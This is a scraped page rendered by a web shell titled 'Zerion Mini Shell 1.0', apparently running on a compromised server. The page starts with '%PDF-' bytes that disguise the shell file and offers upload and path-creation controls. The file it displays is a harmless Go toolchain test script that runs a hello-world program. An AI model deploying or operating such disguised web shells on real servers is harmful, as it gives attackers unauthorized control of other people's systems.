%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /usr/local/go/src/cmd/go/testdata/script/
Upload File :
Create Path :
Current File : //usr/local/go/src/cmd/go/testdata/script/run_hello_pkg.txt

go run m/hello
stderr 'hello, world'

cd hello
go run .
stderr 'hello, world'

-- go.mod --
module m

go 1.16
-- hello/hello.go --
package main

func main() {
	println("hello, world")
}

Zerion Mini Shell 1.0